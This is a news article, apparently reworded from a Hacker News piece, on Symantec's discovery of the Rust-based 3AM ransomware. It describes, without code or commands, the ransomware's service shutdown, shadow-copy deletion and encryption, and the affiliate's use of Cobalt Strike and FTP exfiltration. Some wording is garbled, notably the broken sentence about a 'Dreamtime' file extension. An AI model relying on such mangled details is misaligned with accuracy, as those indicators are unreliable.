An anonymous affiliate deployed the strain after trying in vain to spread LockBit (a ransomware family attributed to Bitwise Spider or Syrphid) across the target network, leading to the discovery of a new ransomware family known as 3AM.
According to a study given with The Hacker News by the Symantec Threat Hunter Team, a division of Broadcom, "3AM is written in Rust and appears to be a completely new malware family."
Before it starts encrypting files, the ransomware makes many attempts to shut down different services on the affected machine. It makes an attempt to erase Volume Shadow (VSS) copies when encryption is finished.
The fact that the ransom note makes a reference to 3AM gives it its moniker. Additionally, it adds. Dreamtime-extended encrypted files to existing files. However, it is not yet known if the malware's developers are affiliated with any well-known e-crime organisations.
In the attack discovered by Symantec, the attacker allegedly succeeded in installing ransomware on three computers connected to the company's network, but it was stopped on two of them.
The intrusion is significant for employing Cobalt Strike for privilege escalation and post-exploitation, and for issuing reconnaissance commands to find additional servers for lateral movement afterward. Uncertainty exists over the attack's precise entrance method.
As Symantec pointed out, "They also added a new user for persistence and used the Wput tool to exfiltrate the victims' files to their own FTP server."
3AM is a 64-bit Rust executable that is designed to execute a series of commands to shut down several security and backup-related programmes, encrypt files that meet certain criteria, and delete volume shadow copies.
Despite the fact that the actual origins of the ransomware are still unknown, there is evidence to imply that it is being used to target other organisations, according to a post uploaded on Reddit on September 9, 2023.
"We've seen no evidence ourselves to suggest that this affiliate has used 3AM again, but we're not surprised to see other reports of 3AM's use," Dick O'Brien, chief intelligence analyst at Symantec, said in a statement to The Hacker News. "It suggests that attackers may perceive it as a credible threat if an experienced LockBit affiliate is using it as their alternate payload."
According to Symantec, "ransomware affiliates have grown more independent from ransomware operators."
"New ransomware families emerge often, but the majority either vanish just as fast or never manage to establish much foothold. However, the fact that a LockBit affiliate used 3AM as a fallback shows that attackers may be interested in it and it might appear again in the future.
Comments